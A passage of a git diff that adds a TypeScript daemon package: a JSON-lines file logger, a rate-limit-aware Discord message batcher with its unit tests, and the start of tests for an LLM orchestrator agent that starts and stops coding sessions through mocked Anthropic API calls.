+    return { registered: false, pid: null, lastExitStatus: null };
+  }
+}
diff --git a/packages/daemon/src/logger.ts b/packages/daemon/src/logger.ts
new file mode 100644
index 000000000..e65e5d4ea
--- /dev/null
+++ b/packages/daemon/src/logger.ts
@@ -0,0 +1,88 @@
+import { createWriteStream, mkdirSync, type WriteStream } from 'node:fs';
+import { dirname } from 'node:path';
+import type { LogLevel, LogEntry } from './types.js';
+
+const LEVEL_ORDER: Record<LogLevel, number> = {
+  debug: 0,
+  info: 1,
+  warn: 2,
+  error: 3,
+};
+
+export interface LoggerOptions {
+  filePath: string;
+  level: LogLevel;
+  verbose?: boolean;
+}
+
+/**
+ * Structured JSON-lines file logger.
+ * Writes LogEntry objects one per line in append mode.
+ * The open write stream keeps the Node event loop alive (daemon keepalive).
+ */
+export class Logger {
+  private readonly stream: WriteStream;
+  private readonly level: number;
+  private readonly verbose: boolean;
+
+  constructor(opts: LoggerOptions) {
+    // Ensure parent directory exists
+    const dir = dirname(opts.filePath);
+    try {
+      mkdirSync(dir, { recursive: true });
+    } catch (err: unknown) {
+      const msg = err instanceof Error ? err.message : String(err);
+      throw new Error(`Cannot create log directory ${dir}: ${msg}`);
+    }
+
+    this.stream = createWriteStream(opts.filePath, { flags: 'a' });
+    this.level = LEVEL_ORDER[opts.level] ?? LEVEL_ORDER.info;
+    this.verbose = opts.verbose ?? false;
+  }
+
+  debug(msg: string, data?: Record<string, unknown>): void {
+    this.write('debug', msg, data);
+  }
+
+  info(msg: string, data?: Record<string, unknown>): void {
+    this.write('info', msg, data);
+  }
+
+  warn(msg: string, data?: Record<string, unknown>): void {
+    this.write('warn', msg, data);
+  }
+
+  error(msg: string, data?: Record<string, unknown>): void {
+    this.write('error', msg, data);
+  }
+
+  /** End the write stream. Resolves when the stream is fully flushed. */
+  close(): Promise<void> {
+    return new Promise<void>((resolve, reject) => {
+      this.stream.end(() => {
+        this.stream.once('close', () => resolve());
+      });
+      this.stream.once('error', reject);
+    });
+  }
+
+  private write(level: LogLevel, msg: string, data?: Record<string, unknown>): void {
+    if (LEVEL_ORDER[level] < this.level) return;
+
+    const entry: LogEntry = {
+      ts: new Date().toISOString(),
+      level,
+      msg,
+      ...(data !== undefined ? { data } : {}),
+    };
+
+    const line = JSON.stringify(entry) + '\n';
+    this.stream.write(line);
+
+    if (this.verbose) {
+      const prefix = `[${entry.ts}] ${level.toUpperCase()}`;
+      const suffix = data ? ` ${JSON.stringify(data)}` : '';
+      process.stderr.write(`${prefix}: ${msg}${suffix}\n`);
+    }
+  }
+}
diff --git a/packages/daemon/src/message-batcher.test.ts b/packages/daemon/src/message-batcher.test.ts
new file mode 100644
index 000000000..c64cf803b
--- /dev/null
+++ b/packages/daemon/src/message-batcher.test.ts
@@ -0,0 +1,308 @@
+import { describe, it, beforeEach, afterEach, mock } from 'node:test';
+import assert from 'node:assert/strict';
+import { MessageBatcher } from './message-batcher.js';
+import type { SendPayload, BatcherLogger } from './message-batcher.js';
+import type { FormattedEvent } from './types.js';
+
+// ---------------------------------------------------------------------------
+// Helpers
+// ---------------------------------------------------------------------------
+
+/** Create a minimal FormattedEvent for testing. */
+function fakeEvent(content: string, hasEmbed = false): FormattedEvent {
+  const fe: FormattedEvent = { content };
+  if (hasEmbed) {
+    // Minimal mock embed — just needs to be truthy and pass through
+    fe.embed = { data: { title: content } } as any;
+  }
+  return fe;
+}
+
+/** Create a tracking send function. */
+function createSend() {
+  const calls: SendPayload[] = [];
+  const fn = mock.fn(async (payload: SendPayload) => {
+    calls.push(payload);
+  });
+  return { fn, calls };
+}
+
+/** Create a logger that captures error/warn calls. */
+function createLogger() {
+  const errors: string[] = [];
+  const warns: string[] = [];
+  const debugs: string[] = [];
+  const logger: BatcherLogger = {
+    error(msg: string) { errors.push(msg); },
+    warn(msg: string) { warns.push(msg); },
+    debug(msg: string) { debugs.push(msg); },
+  };
+  return { logger, errors, warns, debugs };
+}
+
+// ---------------------------------------------------------------------------
+// Tests
+// ---------------------------------------------------------------------------
+
+describe('MessageBatcher', () => {
+  describe('enqueue + capacity flush', () => {
+    it('flushes when buffer reaches maxBatchSize', async () => {
+      const { fn, calls } = createSend();
+      const batcher = new MessageBatcher(fn, undefined, { maxBatchSize: 3, flushIntervalMs: 60_000 });
+
+      batcher.enqueue(fakeEvent('a'));
+      batcher.enqueue(fakeEvent('b'));
+      assert.equal(calls.length, 0, 'should not flush yet');
+
+      batcher.enqueue(fakeEvent('c')); // hits capacity
+      // flush is async — give it a tick
+      await new Promise((r) => setTimeout(r, 10));
+
+      assert.equal(calls.length, 1, 'should have flushed once');
+      assert.equal(calls[0].content, 'a\nb\nc');
+      assert.equal(batcher.pending, 0);
+
+      await batcher.destroy();
+    });
+
+    it('skips embeds for batched messages (only content)', async () => {
+      const { fn, calls } = createSend();
+      const batcher = new MessageBatcher(fn, undefined, { maxBatchSize: 2, flushIntervalMs: 60_000 });
+
+      batcher.enqueue(fakeEvent('a', true));
+      batcher.enqueue(fakeEvent('b', true)); // triggers flush
+      await new Promise((r) => setTimeout(r, 10));
+
+      assert.equal(calls.length, 1);
+      assert.equal(calls[0].embeds.length, 0, 'batched sends skip embeds to avoid duplication');
+      assert.equal(calls[0].content, 'a\nb');
+
+      await batcher.destroy();
+    });
+  });
+
+  describe('enqueueImmediate', () => {
+    it('flushes pending buffer then sends immediately', async () => {
+      const { fn, calls } = createSend();
+      const batcher = new MessageBatcher(fn, undefined, { maxBatchSize: 10, flushIntervalMs: 60_000 });
+
+      batcher.enqueue(fakeEvent('buffered-1'));
+      batcher.enqueue(fakeEvent('buffered-2'));
+
+      await batcher.enqueueImmediate(fakeEvent('blocker!'));
+
+      // First call: the pending buffer flush
+      // Second call: the immediate event
+      assert.equal(calls.length, 2, 'should have two send calls');
+      assert.equal(calls[0].content, 'buffered-1\nbuffered-2');
+      assert.equal(calls[1].content, 'blocker!');
+      assert.equal(batcher.pending, 0);
+
+      await batcher.destroy();
+    });
+
+    it('sends immediately when buffer is empty', async () => {
+      const { fn, calls } = createSend();
+      const batcher = new MessageBatcher(fn, undefined, { maxBatchSize: 10, flushIntervalMs: 60_000 });
+
+      await batcher.enqueueImmediate(fakeEvent('urgent'));
+
+      assert.equal(calls.length, 1);
+      assert.equal(calls[0].content, 'urgent');
+
+      await batcher.destroy();
+    });
+  });
+
+  describe('timer-based flush', () => {
+    it('flushes on interval', async () => {
+      const { fn, calls } = createSend();
+      const batcher = new MessageBatcher(fn, undefined, { maxBatchSize: 100, flushIntervalMs: 50 });
+      batcher.start();
+
+      batcher.enqueue(fakeEvent('timed-1'));
+      batcher.enqueue(fakeEvent('timed-2'));
+
+      // Wait longer than flushIntervalMs
+      await new Promise((r) => setTimeout(r, 120));
+
+      assert.ok(calls.length >= 1, 'timer should have triggered at least one flush');
+      assert.equal(calls[0].content, 'timed-1\ntimed-2');
+      assert.equal(batcher.pending, 0);
+
+      await batcher.destroy();
+    });
+
+    it('stop prevents further timer flushes', async () => {
+      const { fn, calls } = createSend();
+      const batcher = new MessageBatcher(fn, undefined, { maxBatchSize: 100, flushIntervalMs: 30 });
+      batcher.start();
+      batcher.stop();
+
+      batcher.enqueue(fakeEvent('orphan'));
+      await new Promise((r) => setTimeout(r, 80));
+
+      assert.equal(calls.length, 0, 'no flush after stop');
+      // Cleanup without triggering flush timer
+      batcher.stop(); // idempotent
+      // Manually drain for cleanup
+      await batcher.destroy();
+    });
+  });
+
+  describe('destroy', () => {
+    it('flushes remaining buffer on destroy', async () => {
+      const { fn, calls } = createSend();
+      const batcher = new MessageBatcher(fn, undefined, { maxBatchSize: 100, flushIntervalMs: 60_000 });
+
+      batcher.enqueue(fakeEvent('leftover-1'));
+      batcher.enqueue(fakeEvent('leftover-2'));
+
+      await batcher.destroy();
+
+      assert.equal(calls.length, 1);
+      assert.equal(calls[0].content, 'leftover-1\nleftover-2');
+    });
+
+    it('is idempotent — second destroy is no-op', async () => {
+      const { fn, calls } = createSend();
+      const batcher = new MessageBatcher(fn, undefined, { maxBatchSize: 100, flushIntervalMs: 60_000 });
+
+      batcher.enqueue(fakeEvent('once'));
+      await batcher.destroy();
+      await batcher.destroy(); // second call
+
+      assert.equal(calls.length, 1, 'only flushed once');
+    });
+
+    it('enqueue after destroy is silently ignored', async () => {
+      const { fn, calls } = createSend();
+      const batcher = new MessageBatcher(fn, undefined, { maxBatchSize: 2, flushIntervalMs: 60_000 });
+      await batcher.destroy();
+
+      batcher.enqueue(fakeEvent('post-destroy'));
+      await new Promise((r) => setTimeout(r, 10));
+
+      assert.equal(calls.length, 0, 'no sends after destroy');
+    });
+  });
+
+  describe('empty buffer', () => {
+    it('flush of empty buffer is no-op', async () => {
+      const { fn, calls } = createSend();
+      const batcher = new MessageBatcher(fn, undefined, { maxBatchSize: 100, flushIntervalMs: 60_000 });
+      batcher.start();
+
+      // Force a timer tick with an empty buffer
+      await new Promise((r) => setTimeout(r, 10));
+      await batcher.destroy();
+
+      // Only the destroy-triggered flush, which should also be a no-op
+      assert.equal(calls.length, 0, 'no sends for empty buffer');
+    });
+  });
+
+  describe('single-item flush', () => {
+    it('handles a single item in buffer at destroy', async () => {
+      const { fn, calls } = createSend();
+      const batcher = new MessageBatcher(fn, undefined, { maxBatchSize: 100, flushIntervalMs: 60_000 });
+
+      batcher.enqueue(fakeEvent('solo'));
+      await batcher.destroy();
+
+      assert.equal(calls.length, 1);
+      assert.equal(calls[0].content, 'solo');
+      assert.equal(calls[0].embeds.length, 0);
+      assert.equal(calls[0].components.length, 0);
+    });
+  });
+
+  describe('error handling', () => {
+    it('logs error and continues when send throws', async () => {
+      let attempt = 0;
+      const sendFn = async () => {
+        attempt++;
+        throw new Error('Discord rate limit');
+      };
+      const { logger, errors, warns } = createLogger();
+      const batcher = new MessageBatcher(sendFn, logger, { maxBatchSize: 2, flushIntervalMs: 60_000 });
+
+      batcher.enqueue(fakeEvent('x'));
+      batcher.enqueue(fakeEvent('y')); // triggers flush
+      // Wait for flush + retry
+      await new Promise((r) => setTimeout(r, 1500));
+
+      assert.ok(errors.length >= 1, 'should have logged an error');
+      assert.ok(warns.length >= 1, 'should have logged a warning on retry failure');
+      assert.equal(batcher.pending, 0, 'buffer cleared even on error');
+
+      // Batcher should still be alive — enqueue more
+      batcher.enqueue(fakeEvent('after-error'));
+      assert.equal(batcher.pending, 1, 'can still enqueue after error');
+
+      await batcher.destroy();
+    });
+
+    it('succeeds on retry if first attempt fails', async () => {
+      let attempt = 0;
+      const calls: SendPayload[] = [];
+      const sendFn = async (payload: SendPayload) => {
+        attempt++;
+        if (attempt === 1) throw new Error('transient');
+        calls.push(payload);
+      };
+      const { logger, errors } = createLogger();
+      const batcher = new MessageBatcher(sendFn, logger, { maxBatchSize: 2, flushIntervalMs: 60_000 });
+
+      batcher.enqueue(fakeEvent('retry-me'));
+      batcher.enqueue(fakeEvent('retry-too'));
+      // Wait for flush + retry delay
+      await new Promise((r) => setTimeout(r, 1500));
+
+      assert.equal(errors.length, 1, 'logged one error on first attempt');
+      assert.equal(calls.length, 1, 'retry succeeded');
+      assert.equal(calls[0].content, 'retry-me\nretry-too');
+
+      await batcher.destroy();
+    });
+  });
+
+  describe('buffer at exactly capacity', () => {
+    it('flushes at exactly maxBatchSize', async () => {
+      const { fn, calls } = createSend();
+      const batcher = new MessageBatcher(fn, undefined, { maxBatchSize: 4, flushIntervalMs: 60_000 });
+
+      batcher.enqueue(fakeEvent('1'));
+      batcher.enqueue(fakeEvent('2'));
+      batcher.enqueue(fakeEvent('3'));
+      assert.equal(calls.length, 0, 'not flushed at 3/4');
+
+      batcher.enqueue(fakeEvent('4')); // exactly at capacity
+      await new Promise((r) => setTimeout(r, 10));
+
+      assert.equal(calls.length, 1);
+      assert.equal(calls[0].content, '1\n2\n3\n4');
+
+      await batcher.destroy();
+    });
+  });
+
+  describe('components handling', () => {
+    it('uses components from the last event that has them', async () => {
+      const { fn, calls } = createSend();
+      const batcher = new MessageBatcher(fn, undefined, { maxBatchSize: 3, flushIntervalMs: 60_000 });
+
+      const fakeRow = { type: 'ActionRow', components: [] };
+      batcher.enqueue(fakeEvent('no-components'));
+      batcher.enqueue({ content: 'with-components', components: [fakeRow] } as any);
+      batcher.enqueue(fakeEvent('also-no-components')); // triggers flush
+
+      await new Promise((r) => setTimeout(r, 10));
+
+      assert.equal(calls.length, 1);
+      assert.deepEqual(calls[0].components, [fakeRow]);
+
+      await batcher.destroy();
+    });
+  });
+});
diff --git a/packages/daemon/src/message-batcher.ts b/packages/daemon/src/message-batcher.ts
new file mode 100644
index 000000000..eb7625d10
--- /dev/null
+++ b/packages/daemon/src/message-batcher.ts
@@ -0,0 +1,216 @@
+/**
+ * message-batcher.ts — Rate-limit-aware message batcher for Discord.
+ *
+ * Accumulates FormattedEvent payloads and flushes them to a Discord channel
+ * respecting the 5 msg/5s rate limit. Supports:
+ *   - Timer-based periodic flush (default 1.5s)
+ *   - Capacity-based flush when buffer hits maxBatchSize
+ *   - Immediate priority flush for blockers (bypasses batching)
+ *   - Combining multiple embeds into a single send() call
+ *   - Error isolation: send() failures are logged, never crash the batcher
+ */
+
+import type { FormattedEvent } from './types.js';
+
+// ---------------------------------------------------------------------------
+// Types
+// ---------------------------------------------------------------------------
+
+/** Payload passed to the send callback — matches Discord TextChannel.send() shape. */
+export interface SendPayload {
+  content: string;
+  embeds: unknown[];
+  components: unknown[];
+}
+
+/** Send callback abstraction. Returns void or a promise. */
+export type SendFn = (payload: SendPayload) => Promise<void> | void;
+
+/** Logger interface — just needs error/warn/debug. */
+export interface BatcherLogger {
+  error(msg: string, data?: Record<string, unknown>): void;
+  warn(msg: string, data?: Record<string, unknown>): void;
+  debug(msg: string, data?: Record<string, unknown>): void;
+}
+
+/** MessageBatcher configuration options. */
+export interface BatcherOptions {
+  /** Interval between timed flushes in ms. Default: 1500 */
+  flushIntervalMs?: number;
+  /** Max events before triggering an immediate capacity flush. Default: 4 */
+  maxBatchSize?: number;
+}
+
+// ---------------------------------------------------------------------------
+// Default no-op logger
+// ---------------------------------------------------------------------------
+
+const noopLogger: BatcherLogger = {
+  error() {},
+  warn() {},
+  debug() {},
+};
+
+// ---------------------------------------------------------------------------
+// MessageBatcher
+// ---------------------------------------------------------------------------
+
+export class MessageBatcher {
+  private readonly send: SendFn;
+  private readonly logger: BatcherLogger;
+  private readonly flushIntervalMs: number;
+  private readonly maxBatchSize: number;
+
+  private buffer: FormattedEvent[] = [];
+  private timer: ReturnType<typeof setInterval> | null = null;
+  private flushing = false;
+  private destroyed = false;
+
+  constructor(send: SendFn, logger?: BatcherLogger, options?: BatcherOptions) {
+    this.send = send;
+    this.logger = logger ?? noopLogger;
+    this.flushIntervalMs = options?.flushIntervalMs ?? 1500;
+    this.maxBatchSize = options?.maxBatchSize ?? 4;
+  }
+
+  // -----------------------------------------------------------------------
+  // Public API
+  // -----------------------------------------------------------------------
+
+  /** Start the periodic flush timer. */
+  start(): void {
+    if (this.timer) return; // already running
+    this.timer = setInterval(() => {
+      void this.flush();
+    }, this.flushIntervalMs);
+    // Don't hold the process open for the timer
+    if (this.timer && typeof this.timer === 'object' && 'unref' in this.timer) {
+      this.timer.unref();
+    }
+    this.logger.debug('Batcher started', { flushIntervalMs: this.flushIntervalMs });
+  }
+
+  /** Stop the periodic flush timer without flushing. */
+  stop(): void {
+    if (this.timer) {
+      clearInterval(this.timer);
+      this.timer = null;
+    }
+    this.logger.debug('Batcher stopped');
+  }
+
+  /** Flush remaining buffer and stop. Safe to call multiple times. */
+  async destroy(): Promise<void> {
+    if (this.destroyed) return;
+    this.destroyed = true;
+    this.stop();
+    await this.flush();
+    this.logger.debug('Batcher destroyed');
+  }
+
+  /**
+   * Enqueue a formatted event for batched sending.
+   * Triggers an immediate capacity flush if buffer reaches maxBatchSize.
+   */
+  enqueue(formatted: FormattedEvent): void {
+    if (this.destroyed) return;
+    this.buffer.push(formatted);
+    if (this.buffer.length >= this.maxBatchSize) {
+      void this.flush();
+    }
+  }
+
+  /**
+   * Immediately send a high-priority event (e.g. blocker).
+   * Flushes any pending buffer first, then sends the priority event alone.
+   */
+  async enqueueImmediate(formatted: FormattedEvent): Promise<void> {
+    if (this.destroyed) return;
+    // Flush pending buffer first so ordering is preserved
+    await this.flush();
+    // Send the priority event immediately, alone
+    await this.doSend([formatted]);
+  }
+
+  /** Current number of events in the buffer (for testing/diagnostics). */
+  get pending(): number {
+    return this.buffer.length;
+  }
+
+  // -----------------------------------------------------------------------
+  // Internal
+  // -----------------------------------------------------------------------
+
+  /**
+   * Flush the current buffer as a single Discord message.
+   * Multiple embeds are combined into one send() call (Discord supports up to 10).
+   * No-op if buffer is empty.
+   */
+  private async flush(): Promise<void> {
+    if (this.buffer.length === 0) return;
+    if (this.flushing) return; // prevent re-entrant flush
+
+    this.flushing = true;
+    const batch = this.buffer.splice(0); // take all
+    try {
+      await this.doSend(batch);
+    } finally {
+      this.flushing = false;
+    }
+  }
+
+  /**
+   * Build a SendPayload from a batch of FormattedEvents and invoke the send callback.
+   * Catches and logs errors — never throws.
+   *
+   * For batched messages (2+ events), we send content-only to avoid duplication
+   * between content text and embed descriptions, and to stay under Discord's
+   * 10-embed limit. Single-event sends include the embed for rich formatting.
+   */
+  private async doSend(batch: FormattedEvent[]): Promise<void> {
+    if (batch.length === 0) return;
+
+    // Combine content lines
+    const content = batch.map((e) => e.content).join('\n');
+
+    // For single events, include the embed for rich formatting.
+    // For batches, skip embeds — the content lines are self-descriptive and
+    // embeds would duplicate the information + risk hitting Discord's 10-embed cap.
+    const embeds: unknown[] = [];
+    if (batch.length === 1 && batch[0].embed) {
+      embeds.push(batch[0].embed);
+    }
+
+    // Collect all component rows (only from the last event with components —
+    // Discord only supports one set of components per message)
+    let components: unknown[] = [];
+    for (const e of batch) {
+      if (e.components && e.components.length > 0) {
+        components = e.components;
+      }
+    }
+
+    const payload: SendPayload = { content, embeds, components };
+
+    try {
+      await this.send(payload);
+    } catch (err) {
+      const message = err instanceof Error ? err.message : String(err);
+      this.logger.error('Batcher send failed', { error: message, batchSize: batch.length });
+
+      // Retry once after a short delay
+      try {
+        await new Promise((r) => setTimeout(r, 1000));
+        await this.send(payload);
+        this.logger.debug('Batcher retry succeeded');
+      } catch (retryErr) {
+        const retryMessage = retryErr instanceof Error ? retryErr.message : String(retryErr);
+        this.logger.warn('Batcher retry also failed, dropping batch', {
+          error: retryMessage,
+          batchSize: batch.length,
+        });
+        // Drop the batch — don't re-enqueue to prevent infinite loops
+      }
+    }
+  }
+}
diff --git a/packages/daemon/src/orchestrator.test.ts b/packages/daemon/src/orchestrator.test.ts
new file mode 100644
index 000000000..21ea82ff5
--- /dev/null
+++ b/packages/daemon/src/orchestrator.test.ts
@@ -0,0 +1,584 @@
+/**
+ * Tests for Orchestrator — LLM agent for #gsd-control channel.
+ *
+ * Uses a MockAnthropicClient that simulates messages.create() responses,
+ * allowing tool execution and conversation flow testing without real API calls.
+ */
+
+import { describe, it, afterEach } from 'node:test';
+import assert from 'node:assert/strict';
+import { mkdtempSync, rmSync, existsSync } from 'node:fs';
+import { join } from 'node:path';
+import { tmpdir } from 'node:os';
+import { randomUUID } from 'node:crypto';
+import { Orchestrator, type OrchestratorConfig, type OrchestratorDeps, type DiscordMessageLike } from './orchestrator.js';
+import { Logger } from './logger.js';
+import type { ManagedSession, ProjectInfo, SessionStatus, CostAccumulator } from './types.js';
+
+// ---------------------------------------------------------------------------
+// Helpers
+// ---------------------------------------------------------------------------
+
+function tmpDir(): string {
+  return mkdtempSync(join(tmpdir(), `orch-test-${randomUUID().slice(0, 8)}-`));
+}
+
+const cleanupDirs: string[] = [];
+const activeLoggers: Logger[] = [];
+
+async function cleanupAll(): Promise<void> {
+  // Close all loggers first so write streams flush before dirs are removed
+  for (const logger of activeLoggers) {
+    try { await logger.close(); } catch { /* ignore */ }
+  }
+  activeLoggers.length = 0;
+
+  while (cleanupDirs.length) {
+    const d = cleanupDirs.pop()!;
+    if (existsSync(d)) rmSync(d, { recursive: true, force: true });
+  }
+}
+
+// ---------------------------------------------------------------------------
+// Mock Anthropic Client
+// ---------------------------------------------------------------------------
+
+interface MockCreateParams {
+  model: string;
+  max_tokens: number;
+  system: string;
+  tools: unknown[];
+  messages: unknown[];
+}
+
+type CreateHandler = (params: MockCreateParams) => {
+  stop_reason: string;
+  content: Array<{ type: string; text?: string; id?: string; name?: string; input?: unknown }>;
+};
+
+class MockAnthropicClient {
+  public createCallCount = 0;
+  public lastCreateParams: MockCreateParams | null = null;
+  private createHandler: CreateHandler;
+
+  constructor(handler?: CreateHandler) {
+    this.createHandler = handler ?? MockAnthropicClient.defaultHandler;
+  }
+
+  /** Default handler: returns a simple text response */
+  static defaultHandler(): ReturnType<CreateHandler> {
+    return {
+      stop_reason: 'end_turn',
+      content: [{ type: 'text', text: 'Mock LLM response' }],
+    };
+  }
+
+  /** Handler that simulates a tool call then end_turn */
+  static toolThenTextHandler(toolName: string, toolInput: unknown, finalText: string): CreateHandler {
+    let callCount = 0;
+    return () => {
+      callCount++;
+      if (callCount === 1) {
+        return {
+          stop_reason: 'tool_use',
+          content: [
+            {
+              type: 'tool_use',
+              id: `toolu_${randomUUID().slice(0, 8)}`,
+              name: toolName,
+              input: toolInput,
+            },
+          ],
+        };
+      }
+      return {
+        stop_reason: 'end_turn',
+        content: [{ type: 'text', text: finalText }],
+      };
+    };
+  }
+
+  /** Handler that throws an error */
+  static errorHandler(message: string): CreateHandler {
+    return () => {
+      throw new Error(message);
+    };
+  }
+
+  messages = {
+    create: async (params: MockCreateParams) => {
+      this.createCallCount++;
+      this.lastCreateParams = params;
+      return this.createHandler(params);
+    },
+  };
+}
+
+// ---------------------------------------------------------------------------
+// Mock SessionManager
+// ---------------------------------------------------------------------------
+
+function makeMockSession(overrides: Partial<ManagedSession> = {}): ManagedSession {
+  return {
+    sessionId: overrides.sessionId ?? 'sess-123',
+    projectDir: overrides.projectDir ?? '/home/user/project',
+    projectName: overrides.projectName ?? 'my-project',
+    status: overrides.status ?? ('running' as SessionStatus),
+    client: {} as ManagedSession['client'],
+    events: [],
+    pendingBlocker: null,
+    cost: overrides.cost ?? { totalCost: 0.1234, tokens: { input: 1000, output: 500, cacheRead: 0, cacheWrite: 0 } },
+    startTime: overrides.startTime ?? Date.now() - 300_000, // 5 min ago
+    ...overrides,
+  };
+}
+
+class MockSessionManager {
+  public sessions: ManagedSession[] = [];
+  public startSessionCalls: Array<{ projectDir: string; command?: string }> = [];
+  public cancelSessionCalls: string[] = [];
+  public getResultCalls: string[] = [];
+
+  async startSession(opts: { projectDir: string; command?: string }): Promise<string> {
+    this.startSessionCalls.push(opts);
+    return 'sess-new-123';
+  }
+
+  getSession(sessionId: string): ManagedSession | undefined {
+    return this.sessions.find((s) => s.sessionId === sessionId);
+  }
+
+  getAllSessions(): ManagedSession[] {
+    return this.sessions;
+  }
+
+  async cancelSession(sessionId: string): Promise<void> {
+    this.cancelSessionCalls.push(sessionId);
+  }
+
+  getResult(sessionId: string): Record<string, unknown> {
+    const session = this.sessions.find((s) => s.sessionId === sessionId);
+    if (!session) throw new Error(`Session not found: ${sessionId}`);
+    return {
+      sessionId: session.sessionId,
+      projectDir: session.projectDir,
+      projectName: session.projectName,
+      status: session.status,
+      durationMs: 300_000,
+      cost: session.cost,
+      recentEvents: [],
+      pendingBlocker: null,
+      error: null,
+    };
+  }
+}
+
+// ---------------------------------------------------------------------------
+// Mock ChannelManager (unused by orchestrator directly, but required by deps)
+// ---------------------------------------------------------------------------
+
+class MockChannelManager {}
+
+// ---------------------------------------------------------------------------
+// Mock Discord Message
+// ---------------------------------------------------------------------------
+
+function makeMessage(overrides: Partial<{
+  authorId: string;
+  bot: boolean;
+  channelId: string;
+  content: string;
+}>): DiscordMessageLike & { sentMessages: string[] } {
+  const sentMessages: string[] = [];
+  return {
+    author: {
+      id: overrides.authorId ?? 'owner-123',
+      bot: overrides.bot ?? false,
+    },
+    channelId: overrides.channelId ?? 'control-channel-1',
+    content: overrides.content ?? 'hello',
+    channel: {
+      send: async (content: string) => {
+        sentMessages.push(content);
+      },
+      sendTyping: async () => {},
+    },
+    sentMessages,
+  };
+}
+
+// ---------------------------------------------------------------------------
+// Test Setup Factory
+// ---------------------------------------------------------------------------
+
+function makeOrchestrator(opts?: {
+  client?: MockAnthropicClient;
+  sessions?: ManagedSession[];
+  projects?: ProjectInfo[];
+}) {
+  const dir = tmpDir();
+  cleanupDirs.push(dir);
+  const logPath = join(dir, 'test.log');
+  const logger = new Logger({ filePath: logPath, level: 'debug' });
+  activeLoggers.push(logger);
+
+  const sessionManager = new MockSessionManager();
+  if (opts?.sessions) sessionManager.sessions = opts.sessions;
+
+  const projects: ProjectInfo[] = opts?.projects ?? [
+    { name: 'alpha', path: '/home/user/alpha', markers: ['git', 'node', 'gsd'], lastModified: Date.now() },
+    { name: 'bravo', path: '/home/user/bravo', markers: ['git', 'rust'], lastModified: Date.now() },
+  ];
+
+  const config: OrchestratorConfig = {
+    model: 'claude-sonnet-4-20250514',
+    max_tokens: 4096,
+    control_channel_id: 'control-channel-1',
+  };
+
+  const deps: OrchestratorDeps = {
+    sessionManager: sessionManager as unknown as OrchestratorDeps['sessionManager'],
+    channelManager: new MockChannelManager() as unknown as OrchestratorDeps['channelManager'],
+    scanProjects: async () => projects,
+    config,
+    logger,
+    ownerId: 'owner-123',
+  };
+
+  const mockClient = opts?.client ?? new MockAnthropicClient();
+  const orchestrator = new Orchestrator(deps, mockClient as unknown as import('@anthropic-ai/sdk').default);
+
+  return { orchestrator, mockClient, sessionManager, logger, logPath };
+}
+
+// ---------------------------------------------------------------------------
+// Tests
+// ---------------------------------------------------------------------------
+
+describe('Orchestrator', () => {
+  // Clean up after each test so logger streams are flushed before dirs removed
+  afterEach(async () => {
+    await cleanupAll();
+  });
+
+  // ---- Tool definitions ----
+
+  describe('tool definitions', () => {
+    it('passes 5 tools to the Anthropic API', async () => {
+      const { orchestrator, mockClient } = makeOrchestrator();
+      const msg = makeMessage({ content: 'what can you do?' });
+      await orchestrator.handleMessage(msg);
+
+      assert.ok(mockClient.lastCreateParams);
+      const tools = mockClient.lastCreateParams.tools as Array<{ name: string }>;
+      assert.equal(tools.length, 5);
+
+      const names = tools.map((t) => t.name).sort();
+      assert.deepEqual(names, [
+        'get_session_detail',
+        'get_status',
+        'list_projects',
+        'start_session',
+        'stop_session',
+      ]);
+    });
+  });
+
+  // ---- list_projects tool ----
+
+  describe('list_projects tool', () => {
+    it('returns project list from scanProjects', async () => {
+      const mockClient = new MockAnthropicClient(
+        MockAnthropicClient.toolThenTextHandler('list_projects', {}, 'Here are your projects'),
+      );
+      const { orchestrator } = makeOrchestrator({ client: mockClient });
+      const msg = makeMessage({ content: 'list my projects' });
+      await orchestrator.handleMessage(msg);
+
+      assert.equal(msg.sentMessages.length, 1);
+      assert.equal(msg.sentMessages[0], 'Here are your projects');
+      // The tool was called (2 create calls: tool_use + end_turn)
+      assert.equal(mockClient.createCallCount, 2);
+    });
+  });
+
+  // ---- start_session tool ----
+
+  describe('start_session tool', () => {
+    it('calls sessionManager.startSession and returns confirmation', async () => {
+      const mockClient = new MockAnthropicClient(
+        MockAnthropicClient.toolThenTextHandler(
+          'start_session',
+          { projectPath: '/home/user/alpha' },
+          'Started session for alpha',
+        ),
+      );
+      const { orchestrator, sessionManager } = makeOrchestrator({ client: mockClient });
+      const msg = makeMessage({ content: 'start alpha' });
+      await orchestrator.handleMessage(msg);
+
+      assert.equal(sessionManager.startSessionCalls.length, 1);
+      assert.equal(sessionManager.startSessionCalls[0]!.projectDir, '/home/user/alpha');
+      assert.equal(msg.sentMessages[0], 'Started session for alpha');
+    });
+  });
+
+  // ---- get_status tool ----
+
+  describe('get_status tool', () => {
+    it('returns formatted session status', async () => {
+      const session = makeMockSession({ projectName: 'alpha', status: 'running' as SessionStatus });
+      const mockClient = new MockAnthropicClient(
+        MockAnthropicClient.toolThenTextHandler('get_status', {}, 'Status: alpha is running'),
+      );
+      const { orchestrator } = makeOrchestrator({ client: mockClient, sessions: [session] });
+      const msg = makeMessage({ content: 'status' });
+      await orchestrator.handleMessage(msg);
+
+      assert.equal(msg.sentMessages[0], 'Status: alpha is running');
+    });
+
+    it('handles empty session list', async () => {
+      const mockClient = new MockAnthropicClient(
+        MockAnthropicClient.toolThenTextHandler('get_status', {}, 'No sessions running'),
+      );
+      const { orchestrator } = makeOrchestrator({ client: mockClient, sessions: [] });
+      const msg = makeMessage({ content: 'status' });
+      await orchestrator.handleMessage(msg);
+
+      assert.equal(msg.sentMessages[0], 'No sessions running');
+    });
+  });
+
+  // ---- stop_session tool ----
+
+  describe('stop_session tool', () => {
+    it('stops session matched by sessionId', async () => {
+      const session = makeMockSession({ sessionId: 'sess-abc', projectName: 'alpha' });
+      const mockClient = new MockAnthropicClient(
+        MockAnthropicClient.toolThenTextHandler(
+          'stop_session',
+          { identifier: 'sess-abc' },
+          'Stopped alpha',
+        ),
+      );
+      const { orchestrator, sessionManager } = makeOrchestrator({ client: mockClient, sessions: [session] });
+      const msg = makeMessage({ content: 'stop sess-abc' });
+      await orchestrator.handleMessage(msg);
+
+      assert.equal(sessionManager.cancelSessionCalls.length, 1);
+      assert.equal(sessionManager.cancelSessionCalls[0], 'sess-abc');
+    });
+
+    it('fuzzy matches by project name', async () => {
+      const session = makeMockSession({ sessionId: 'sess-xyz', projectName: 'my-big-project' });
+      const mockClient = new MockAnthropicClient(
+        MockAnthropicClient.toolThenTextHandler(
+          'stop_session',
+          { identifier: 'big-project' },
+          'Stopped my-big-project',
+        ),
+      );
+      const { orchestrator, sessionManager } = makeOrchestrator({ client: mockClient, sessions: [session] });
